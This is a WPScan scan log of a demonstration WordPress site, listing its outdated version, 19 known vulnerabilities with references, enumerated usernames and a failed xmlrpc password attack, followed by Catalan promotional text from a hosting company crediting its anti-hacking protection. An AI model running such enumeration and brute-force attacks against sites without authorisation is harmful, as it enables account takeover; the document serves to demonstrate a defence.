\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
\ \/  \/ / |  ___/ \___ \ / __|/ _` | ‘_ \
\  /\  /  | |     ____) | (__| (_| | | | |
\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.4.5
Sponsored by Sucuri – https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://pruebadeconcepto.com/
[+] Started: Mon Mar 18 10:33:31 2019

Interesting Finding(s):

[+] http://pruebadeconcepto.com/
| Interesting Entries:
| – Server: Apache
| – Upgrade: h2
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://pruebadeconcepto.com/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| – http://codex.wordpress.org/XML-RPC_Pingback_API
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| – https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://pruebadeconcepto.com/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://pruebadeconcepto.com/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| – https://www.iplocation.net/defend-wordpress-from-ddos
| – https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.6.8 identified (Insecure, released on 2017-10-31).
| Detected By: Rss Generator (Passive Detection)
| – http://pruebadeconcepto.com/?feed=rss2, https://wordpress.org/?v=4.6.8
| – http://pruebadeconcepto.com/?feed=comments-rss2, https://wordpress.org/?v=4.6.8
|
| [!] 19 vulnerabilities identified:
|
| [!] Title: WordPress 2.8.6-4.9 – Authenticated JavaScript File Upload
| Fixed in: 4.6.9
| References:
| – https://wpvulndb.com/vulnerabilities/8966
| – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
| – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| – https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
|
| [!] Title: WordPress 1.5.0-4.9 – RSS and Atom Feed Escaping
| Fixed in: 4.6.9
| References:
| – https://wpvulndb.com/vulnerabilities/8967
| – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
| – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| – https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
|
| [!] Title: WordPress 4.3.0-4.9 – HTML Language Attribute Escaping
| Fixed in: 4.6.9
| References:
| – https://wpvulndb.com/vulnerabilities/8968
| – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
| – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| – https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
|
| [!] Title: WordPress 3.7-4.9 – ‘newbloguser’ Key Weak Hashing
| Fixed in: 4.6.9
| References:
| – https://wpvulndb.com/vulnerabilities/8969
| – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
| – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| – https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
|
| [!] Title: WordPress 3.7-4.9.1 – MediaElement Cross-Site Scripting (XSS)
| Fixed in: 4.6.10
| References:
| – https://wpvulndb.com/vulnerabilities/9006
| – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
| – https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
| – https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
| – https://core.trac.wordpress.org/ticket/42720
|
| [!] Title: WordPress <= 4.9.4 – Application Denial of Service (DoS) (unpatched) | References: | – https://wpvulndb.com/vulnerabilities/9021 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389 | – https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html | – https://github.com/quitten/doser.py | – https://thehackernews.com/2018/02/wordpress-dos-exploit.html | | [!] Title: WordPress 3.7-4.9.4 – Remove localhost Default | Fixed in: 4.6.11 | References: | – https://wpvulndb.com/vulnerabilities/9053 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101 | – https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | – https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216 | | [!] Title: WordPress 3.7-4.9.4 – Use Safe Redirect for Login | Fixed in: 4.6.11 | References: | – https://wpvulndb.com/vulnerabilities/9054 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100 | – https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | – https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e | | [!] Title: WordPress 3.7-4.9.4 – Escape Version in Generator Tag | Fixed in: 4.6.11 | References: | – https://wpvulndb.com/vulnerabilities/9055 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102 | – https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | – https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d | | [!] Title: WordPress <= 4.9.6 – Authenticated Arbitrary File Deletion | Fixed in: 4.6.12 | References: | – https://wpvulndb.com/vulnerabilities/9100 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895 | – https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/ | – http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/ | – https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd | – https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/ | – https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/ | | [!] Title: WordPress <= 5.0 – Authenticated File Delete | Fixed in: 4.6.13 | References: | – https://wpvulndb.com/vulnerabilities/9169 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147 | – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 – Authenticated Post Type Bypass | Fixed in: 4.6.13 | References: | – https://wpvulndb.com/vulnerabilities/9170 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152 | – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | – https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/ | | [!] Title: WordPress <= 5.0 – PHP Object Injection via Meta Data | Fixed in: 4.6.13 | References: | – https://wpvulndb.com/vulnerabilities/9171 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148 | – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 – Authenticated Cross-Site Scripting (XSS) | Fixed in: 4.6.13 | References: | – https://wpvulndb.com/vulnerabilities/9172 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153 | – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 – Cross-Site Scripting (XSS) that could affect plugins | Fixed in: 4.6.13 | References: | – https://wpvulndb.com/vulnerabilities/9173 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150 | – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | – https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460 | | [!] Title: WordPress <= 5.0 – User Activation Screen Search Engine Indexing | Fixed in: 4.6.13 | References: | – https://wpvulndb.com/vulnerabilities/9174 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151 | – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 – File Upload to XSS on Apache Web Servers | Fixed in: 4.6.13 | References: | – https://wpvulndb.com/vulnerabilities/9175 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149 | – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | – https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a | | [!] Title: WordPress 3.7-5.0 (except 4.9.9) – Authenticated Code Execution | Fixed in: 5.0.1 | References: | – https://wpvulndb.com/vulnerabilities/9222 | – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942 | – https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ | | [!] Title: WordPress 3.9-5.1 – Comment Cross-Site Scripting (XSS) | Fixed in: 4.6.14 | References: | – https://wpvulndb.com/vulnerabilities/9230 | – https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b | – https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/ | – https://blog.ripstech.com/2019/wordpress-csrf-to-rce/ [+] WordPress theme in use: twentysixteen | Location: http://pruebadeconcepto.com/wp-content/themes/twentysixteen/ | Last Updated: 2019-02-21T00:00:00.000Z | Readme: http://pruebadeconcepto.com/wp-content/themes/twentysixteen/readme.txt | [!] The version is out of date, the latest version is 1.9 | Style URL: http://pruebadeconcepto.com/wp-content/themes/twentysixteen/style.css?ver=4.6.8 | Style Name: Twenty Sixteen | Style URI: https://wordpress.org/themes/twentysixteen/ | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead … | Author: the WordPress team | Author URI: https://wordpress.org/ | | Detected By: Css Style (Passive Detection) | | Version: 1.3 (80% confidence) | Detected By: Style (Passive Detection) | – http://pruebadeconcepto.com/wp-content/themes/twentysixteen/style.css?ver=4.6.8, Match: ‘Version: 1.3’ [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups – Time: 00:00:00 <==========================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs – Time: 00:00:00 <=========================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] superadmin
| Detected By: Author Posts – Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing – Author Pattern (Aggressive Detection)

[+] editor
| Detected By: Author Id Brute Forcing – Author Pattern (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 2 user/s
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.

Analitzant el resultat que es mostra a la pantalla, veuràs que no pots accedir al WordPress que vols atacar, contínuament es mostra el missatge “Error: Request timed out.”, Això és a causa de que la seguretat Anti Hacking està detectant l’amenaça i bloquejant a temps real.

Així evitem que atacants maliciosos que utilitzen eines estàndards i no molt difícils de trobar a Internet puguin atacar, prendre el control, ni robar-te dades del teu WordPress.

Pots obtenir més informació sobre com funciona la seguretat Anti hacking en els nostres Hostings a:
https://www.swhosting.com/blog/seguridad-antihacking-hosting/

No oblidis transferir el teu WordPress a SW Hosting prement aquí. Recorda que disposem d’instal·ladors automàtics de WordPress en 1 sol clic en el moment que realitzes l’activació del teu Hosting, molt fàcil i ràpid.

Pots consultar com migrar el teu WordPress a SW Hosting en el següent manual:
Com migrar el meu WordPress a SW Hosting

Pots transferir el teu hosting cap SW Hosting utilitzant el següent link:
Transferir el meu hosting a SW Hosting
Si vols més informació o tens dubtes contacta amb nosaltres a través del formulari que trobaràs a Formulari de Contacte